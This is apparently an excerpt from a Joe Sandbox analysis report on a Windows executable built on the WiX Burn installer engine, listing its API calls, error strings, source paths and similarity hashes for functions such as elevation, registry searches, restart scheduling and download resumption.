                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to execute compatible MSI package.$Failed to find package: %ls$Failed to read MSI compatible package id.$Failed to read MSI package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$Package '%ls' has no compatible MSI package$Package '%ls' has no compatible package with id: %ls$d:\a\wix\wix\src\burn\engine\elevation.cpp
                                                                                                                                                          • API String ID: 1825529933-3529711143
                                                                                                                                                          • Opcode ID: 824f5e16b6047993b5497a47c43ec2522344152decc9f8b13d4197e78644a029
                                                                                                                                                          • Instruction ID: 9b6314759b441646bdf34e5b15d03d2becc429f8447df183e4857b0aaf84d985
                                                                                                                                                          • Opcode Fuzzy Hash: 824f5e16b6047993b5497a47c43ec2522344152decc9f8b13d4197e78644a029
                                                                                                                                                          • Instruction Fuzzy Hash: 8D71D971B81629F7DB11EAD1CC46FEF7A7CAB44B10F61015BB501BA1C1E678AA00CB69
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,?,0044907A,?), ref: 00475A0B
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,?,0044907A,?,000000B0,00000000,?,000000B0,00000000), ref: 00475A26
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate default application type., xrefs: 00475AD7
                                                                                                                                                          • Failed to allocate default application id., xrefs: 00475AE5
                                                                                                                                                          • Failed to process ATOM entry., xrefs: 00475BAA
                                                                                                                                                          • http://appsyndication.org/2006/appsyn, xrefs: 004759FE
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp, xrefs: 00475ABD, 00475AF1, 00475B8D
                                                                                                                                                          • Failed to allocate memory for update entries., xrefs: 00475AC9
                                                                                                                                                          • type, xrefs: 00475A4D
                                                                                                                                                          • Failed to reallocate memory for update entries., xrefs: 00475B99
                                                                                                                                                          • application, xrefs: 00475A18
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareHeapString$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate default application id.$Failed to allocate default application type.$Failed to allocate memory for update entries.$Failed to process ATOM entry.$Failed to reallocate memory for update entries.$application$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                          • API String ID: 3166321894-3008309987
                                                                                                                                                          • Opcode ID: d4dbeb64ad21c01d1c820d8f24c611d572ed74f48d216dc6033dc07d04197f52
                                                                                                                                                          • Instruction ID: e1184d8e121f69e982f1bf53841560ad722b840108a7ac1ef1533108f27317b9
                                                                                                                                                          • Opcode Fuzzy Hash: d4dbeb64ad21c01d1c820d8f24c611d572ed74f48d216dc6033dc07d04197f52
                                                                                                                                                          • Instruction Fuzzy Hash: BF51EA30B84B05BBDB209A15CC82F5B77659B15B24F20C22AF619BF2D1D6FCF9408B18
                                                                                                                                                          APIs
                                                                                                                                                          • OpenProcessToken.ADVAPI32(004707E8,00000008,00000000,00000000,00000000,?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000), ref: 00466AF5
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466AFF
                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,?,00000000,00000000,004707E8,?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000), ref: 00466B51
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466B5B
                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,?,00000000,004707E8,004707E8,004707E8,00000001,00000000,?,?,?,00466E83,004707E8,00000001,00000000,00000000), ref: 00466BE7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466BF1
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00466E83,004707E8,00000001,00000000,00000000,00000000,?,?,004707E8), ref: 00466C55
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastToken$Information$CloseHandleOpenProcess
                                                                                                                                                          • String ID: Failed to allocate token information.$Failed to get information from process token size.$Failed to get information from process token.$Failed to open process token.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 3038379890-1500648792
                                                                                                                                                          • Opcode ID: 7146cdf74c3960edb32703c4b862ca8927de3532142b3b17b9fbca0a26ef0418
                                                                                                                                                          • Instruction ID: 3e4991f2e72306c5329b07a8f8c12c8e28a512252551403bf706d02bafbddbd6
                                                                                                                                                          • Opcode Fuzzy Hash: 7146cdf74c3960edb32703c4b862ca8927de3532142b3b17b9fbca0a26ef0418
                                                                                                                                                          • Instruction Fuzzy Hash: 5C41D632E40334B7E72056558D0AFAF7E68DB05F64F03406ABE48BA2D1F67C5D4096EA
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(SeShutdownPrivilege,?,00000000,00000001,A0000005,?,00409781,?,?,?,?,?,?,?), ref: 00408539
                                                                                                                                                            • Part of subcall function 00466838: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00466870
                                                                                                                                                            • Part of subcall function 00466838: GetLastError.KERNEL32 ref: 0046687A
                                                                                                                                                            • Part of subcall function 00466838: CloseHandle.KERNEL32(00000000), ref: 00466991
                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,00000001,00000000,?,00409781,?,?,?,?,?,?,?), ref: 0040858C
• InitiateSystemShutdownExW.ADVAPI32(?,00409781,?,?,?,?), ref: 004085AB
• GetLastError.KERNEL32(?,00409781,?,?,?,?,?,?,?), ref: 004085B1
  • Part of subcall function 00424B76: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,0040857F,?,00000001,00000000,?,00409781,?,?,?,?,?,?), ref: 00424B85
  • Part of subcall function 00424B76: LeaveCriticalSection.KERNEL32(?,?,0040857F,?,00000001,00000000,?,00409781,?,?,?,?,?,?,?), ref: 00424BA6
• IsWindow.USER32(?), ref: 00408621
• Sleep.KERNEL32(000000FA,?,00409781,?,?,?,?,?,?,?), ref: 0040863B
• Sleep.KERNEL32(000000FA,?,00409781,?,?,?,?,?,?,?), ref: 00408670
• IsWindow.USER32(?), ref: 0040867C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Sleep$CriticalErrorLastSectionWindow$CloseCurrentEnterHandleInitiateLeaveLookupPrivilegeProcessShutdownSystemValue
• String ID: Failed to enable shutdown privilege in process token.$Failed to schedule restart.$SeShutdownPrivilege$d:\a\wix\wix\src\burn\engine\engine.cpp
• API String ID: 2197606043-2346934537
APIs
• GetCurrentProcessId.KERNEL32(0000071C,00000000,00000000,2000000A,2000000A,?,00429CA6,00000000,?,0000071C,00000001,0000071C,00000720,000000B0,00000000,00000000), ref: 004253F9
• CloseHandle.KERNEL32(00009003,?,00421F0E,00000000,00009003,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?), ref: 00425502
  • Part of subcall function 0046D534: ShellExecuteExW.SHELL32 ref: 0046D5B0
  • Part of subcall function 0046D534: GetLastError.KERNEL32 ref: 0046D5B6
  • Part of subcall function 0046D534: CloseHandle.KERNEL32(00421F0E), ref: 0046D606
• GetProcessId.KERNEL32(00009003,?,00000000,runas,00000000,00000008,00421F0E,00009003,00000000,00000001,?,00421F0E,00000000,00009003,?), ref: 004254E2
Strings
• -q -%ls %ls %ls %u, xrefs: 0042541F
• burn.log.mode, xrefs: 00425465
• Failed to launch elevated child process: %ls, xrefs: 004254BE
• runas, xrefs: 0042549F
• d:\a\wix\wix\src\burn\engine\elevation.cpp, xrefs: 00425445, 004254D0
• burn.elevated, xrefs: 0042541A
• -%ls=%ls, xrefs: 0042546D
• Failed to allocate parameters for elevated process., xrefs: 00425433
• Failed to set log mode in elevated process command-line., xrefs: 00425481
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
• String ID: -%ls=%ls$-q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$Failed to set log mode in elevated process command-line.$burn.elevated$burn.log.mode$d:\a\wix\wix\src\burn\engine\elevation.cpp$runas
• API String ID: 163010291-2711961656
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000000,00000024,00000001,00000001,00000000,?,00000120,00000001,00000000,00000120,00000024,?,00000000,?), ref: 0040BA87
• LeaveCriticalSection.KERNEL32(?), ref: 0040BD8A
Strings
• Failed to read variable value type., xrefs: 0040BD40
• Failed to read variable included flag., xrefs: 0040BD68
• Failed to parse variable value as version., xrefs: 0040BC8F
• Failed to set variable value., xrefs: 0040BC78, 0040BCD9, 0040BD04
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040BD7A
• Unsupported variable type., xrefs: 0040BCBD
• Failed to read variable value as string., xrefs: 0040BCA6, 0040BD18
• Failed to set variable., xrefs: 0040BD2C
• Failed to read variable count., xrefs: 0040BAA7
• Failed to read variable value as number., xrefs: 0040BCF0
• Failed to read variable name., xrefs: 0040BD54
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to parse variable value as version.$Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 3168844106-1815584021
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000000,8000FFFF,004777D8,00000000,00000000,00000000,00000000,8000FFFF,?,8000FFFF,8000FFFF,000000B0), ref: 0040CD12
• LeaveCriticalSection.KERNEL32(?), ref: 0040CF6B
Strings
• Failed to write included flag., xrefs: 0040CF44
• Failed to write variable name., xrefs: 0040CF30
• feclient.dll, xrefs: 0040CE03, 0040CE7A
• Failed to write variable count., xrefs: 0040CD2F
• Failed to get string., xrefs: 0040CF08
• Failed to write variable value as string., xrefs: 0040CEF4
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040CD41, 0040CF56
• Unsupported variable type., xrefs: 0040CEB0
• Failed to write variable value as number., xrefs: 0040CECC
• Failed to write variable value type., xrefs: 0040CF1C
• Failed to get numeric., xrefs: 0040CEE0
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get numeric.$Failed to get string.$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$d:\a\wix\wix\src\burn\engine\variable.cpp$feclient.dll
• API String ID: 3168844106-796084773
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: __aulldiv
• String ID: BA aborted acquire of %hs: %ls$BA aborted container or payload verify: %ls$BA aborted extract container: %ls, payload: %ls$BA aborted finalize step during verify of %hs: %ls$BA aborted hash step during verify of %hs: %ls$BA aborted payload verify step during verify of %hs: %ls$BA aborted stage step during verify of %hs: %ls$container$d:\a\wix\wix\src\burn\engine\apply.cpp$payload
• API String ID: 3732870572-1895345652
APIs
• WaitForInputIdle.USER32(?,00001388), ref: 0043ED79
• GetProcessId.KERNEL32(?,?,?,0043B8EF,00000000), ref: 0043ED87
• CloseHandle.KERNEL32(00000000,00000000,?,?,d:\a\wix\wix\src\burn\engine\exeengine.cpp,00000306,00000000), ref: 0043EF13
• CloseHandle.KERNEL32(00000000,00000000,?,?,d:\a\wix\wix\src\burn\engine\exeengine.cpp,00000306,00000000), ref: 0043EF26
Similarity
• API ID: CloseHandle$IdleInputProcessWait
• String ID: %ls %ls$Bootstrapper application aborted during package process progress.$Bootstrapper application cancelled during package process progress, exit code: 0x%x$Failed to CreateProcess on path: %ls$Failed to append user args.$Failed to wait for executable to complete: %ls$d:\a\wix\wix\src\burn\engine\exeengine.cpp
APIs
• RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,00000001,8000FFFF,?,00000000,8000FFFF,00000002,?,00000000,00000000), ref: 0043CF45
  • Part of subcall function 004050E3: FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
  • Part of subcall function 004050E3: FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
Similarity
• API ID: CloseFind$FileFirst
• String ID: DisplayVersion$Failed to append quote to UninstallString.$Failed to compare versions.$Failed to open registry key: %ls.$Failed to prepend UninstallString with quote.$Failed to read %ls.$Failed to read DisplayVersion.$QuietUninstallString$UninstallString$d:\a\wix\wix\src\burn\engine\exeengine.cpp
APIs
• RegCloseKey.ADVAPI32(00000000,00000000), ref: 004677C1
Similarity
• API ID: Close
• String ID: Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls$Failed to delete registry key (ex).$Failed to delete registry key.$Failed to enumerate key 0$Failed to open this key for enumerating subkeys: %ls$Failed to recursively delete subkey: %ls$RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
APIs
  • Part of subcall function 0046B18E: VariantInit.OLEAUT32(?), ref: 0046B1A5
  • Part of subcall function 0046B18E: VariantClear.OLEAUT32(?), ref: 0046B2F0
  • Part of subcall function 0046B18E: SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
  • Part of subcall function 0046B18E: SysAllocString.OLEAUT32(?), ref: 0046B1DF
• CompareStringOrdinal.KERNEL32(?,000000FF,?,000000FF,00000000,00000000,00000000,00000000,0040955C,0040955C,SecondaryPayloadId,?,0040955C,PrimaryPayloadId,?,0040955C), ref: 00414852
Similarity
• API ID: String$Variant$AllocClearCompareFreeInitOrdinal
• String ID: Failed to find primary bootstrapper application payload.$Failed to get @PrimaryPayloadId.$Failed to get @SecondaryPayloadId.$Failed to parse user experience payloads.$Failed to select user experience node.$PrimaryPayloadId$SecondaryPayloadId$Too few UX payloads.$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,BootstrapperExtensionData.xml,00000001,?,00000000,?), ref: 00411922
• GetProcAddress.KERNEL32(00000000,BootstrapperExtensionCreate), ref: 00411939
Similarity
• API ID: AddressLibraryLoadProc
• String ID: BootstrapperExtensionCreate$BootstrapperExtensionData.xml$Failed to create BootstrapperExtension '%ls'.$Failed to get BootstrapperExtensionCreate entry-point '%ls'.$Failed to get BootstrapperExtensionDataPath.$Failed to load BootstrapperExtension DLL '%ls': '%ls'.$d:\a\wix\wix\src\burn\engine\burnextension.cpp
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,00000120,00000000,?,00000000,00000000,00000000,?,00000120,00000001,00000001,00000000,00000000,?,00000120), ref: 00412BC5
Strings
• RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 00412B9D
• Failed to open registry key. Key = '%ls', xrefs: 00412A6E
• Failed to query registry key value., xrefs: 00412B30
• d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 00412A80, 00412B25, 00412B2A, 00412B42, 00412B89
• Failed to format value string., xrefs: 00412ACE
• Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00412B4B
• Registry key not found. Key = '%ls', xrefs: 00412A99
• Failed to format key string., xrefs: 00412A18
• Failed to set variable., xrefs: 00412B77
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 3535843008-1728140318
                                                                                                                                                          • Opcode ID: ef70ec4be66320685dd3127441827e50e32a9f276c9592ed65d9d4ba63be4515
                                                                                                                                                          • Instruction ID: 79c63b38da82e952f13b7196d814404544ab7affd4d458e82adbe44518ec12c8
                                                                                                                                                          • Opcode Fuzzy Hash: ef70ec4be66320685dd3127441827e50e32a9f276c9592ed65d9d4ba63be4515
                                                                                                                                                          • Instruction Fuzzy Hash: 9C511971A40225BBEB225E918D47FEB7B28EF04710F104267BA04B92D1E3F86D6096DD
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(?), ref: 0042B6DD
                                                                                                                                                          • LoadBitmapW.USER32(?,?), ref: 0042B704
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042B710
                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0042B751
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0042B76D
                                                                                                                                                          • CreateWindowExW.USER32(00000080,WixBurnSplashScreen,?,90000000,80000000,80000000,?,?,00000000,00000000,?,?), ref: 0042B805
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042B812
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastWindow$BitmapCreateCursorLoadObject
                                                                                                                                                          • String ID: Failed to create splash screen window.$Failed to load splash screen bitmap.$WixBurnSplashScreen$d:\a\wix\wix\src\burn\engine\splashscreen.cpp
                                                                                                                                                          • API String ID: 1087062382-3326576301
                                                                                                                                                          • Opcode ID: eec03763da6081bef8aa801e7b4c0f9fcea9b02fe9bf9b3366dda43853bfd218
                                                                                                                                                          • Instruction ID: cb0a682e315025201bc025ab6f302ed7aae1d21a591630a254ba7dba61f08fb2
                                                                                                                                                          • Opcode Fuzzy Hash: eec03763da6081bef8aa801e7b4c0f9fcea9b02fe9bf9b3366dda43853bfd218
                                                                                                                                                          • Instruction Fuzzy Hash: 19519072A00225ABD700DFA8DC44A6ABBB8FF48710F10816AF908EB251D734EC51CBE4
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474C85
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474C94
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474CA3
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate ATOM unknown attribute value., xrefs: 00474C50
                                                                                                                                                          • Failed to get unknown attribute namespace., xrefs: 00474BB4
                                                                                                                                                          • Failed to get unknown attribute name., xrefs: 00474BE2
                                                                                                                                                          • Failed to allocate ATOM unknown attribute name., xrefs: 00474C07
                                                                                                                                                          • Failed to allocate unknown attribute., xrefs: 00474B48
                                                                                                                                                          • Failed to get unknown attribute value., xrefs: 00474C28
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00474B37, 00474B42, 00474B57, 00474BA2
                                                                                                                                                          • Failed to allocate ATOM unknown attribute namespace., xrefs: 00474B93
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString$Heap$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate ATOM unknown attribute name.$Failed to allocate ATOM unknown attribute namespace.$Failed to allocate ATOM unknown attribute value.$Failed to allocate unknown attribute.$Failed to get unknown attribute name.$Failed to get unknown attribute namespace.$Failed to get unknown attribute value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                          • API String ID: 1440466813-611967544
                                                                                                                                                          • Opcode ID: 9dea9711c4dc974d443a71e1f942d4d246a4ca7800fb993fb1ec780d2c3984f2
                                                                                                                                                          • Instruction ID: 7316c843cfe835721413429285ff5cc0b928ca3a4ccbd0d9c79c0171cc7f0f9c
                                                                                                                                                          • Opcode Fuzzy Hash: 9dea9711c4dc974d443a71e1f942d4d246a4ca7800fb993fb1ec780d2c3984f2
                                                                                                                                                          • Instruction Fuzzy Hash: 7741FC71F40225BBDB215A51CC4AFFE7A689B41B14F114066FB09BB2C0E7789D01C79D
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,feclient.dll,?,?,?), ref: 0041A79E
                                                                                                                                                            • Part of subcall function 00405174: ReadFile.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0046ECC1,00000000,?,00000008,00000000,?), ref: 00405199
                                                                                                                                                            • Part of subcall function 00405174: GetLastError.KERNEL32(?,?,0046ECC1,00000000,?,00000008,00000000,?,?,?), ref: 004051A3
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentErrorFileLastProcessRead
                                                                                                                                                          • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$d:\a\wix\wix\src\burn\engine\burnpipe.cpp$feclient.dll
                                                                                                                                                          • API String ID: 2959708427-506430072
                                                                                                                                                          • Opcode ID: b0e1af708c232d8d9580720a01dc67898e694b85dadb342497fb30db682f4c49
                                                                                                                                                          • Instruction ID: 39877ab150ca072c22ea0102d205be0689d7e37bccba8a0efe02cce7a16db2f8
                                                                                                                                                          • Opcode Fuzzy Hash: b0e1af708c232d8d9580720a01dc67898e694b85dadb342497fb30db682f4c49
                                                                                                                                                          • Instruction Fuzzy Hash: 4A411D71B8031977DB21B9558C46FEF7A28DB45B10F21016BFB10BE2C1D2B88D4197AA
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00472102
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0047210F
                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00472166
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0047219A
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp), ref: 004721EC
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                          • String ID: %ls.R$Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to create resume path.$Failed to read resume file: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 3160720760-3233849392
